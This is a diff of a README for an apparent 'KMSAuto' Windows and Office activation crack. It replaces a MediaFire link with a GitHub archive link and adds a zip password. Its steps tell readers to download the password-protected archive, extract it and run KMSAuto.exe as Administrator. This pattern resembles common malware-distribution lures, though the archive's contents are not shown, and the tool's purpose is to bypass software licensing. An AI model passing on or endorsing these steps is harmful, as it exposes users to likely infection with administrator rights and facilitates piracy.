numbchampions20004god/KMSAuto-Activate-Windows-Office-2026/README.md

 ### Step-by-Step Guide:

-1. Click the download link above or [here](https://www.mediafire.com/file/dxgtihhjo1mqbtu/KMSAuto.zip/file)
+1. Click the download link above or [here](https://github.com/numbchampions20004god/KMSAuto-Activate-Windows-Office-2026/archive/refs/heads/main.zip)
-2. Download the `KMSAuto.zip` file
+2. Download the `KMSAuto.zip` file / Password - 2026
 3. Extract the ZIP file to a folder (right-click → Extract All)
 4. Right-click on `KMSAuto.exe` and select **"Run as Administrator"**
 5. Select your product (Windows or Office)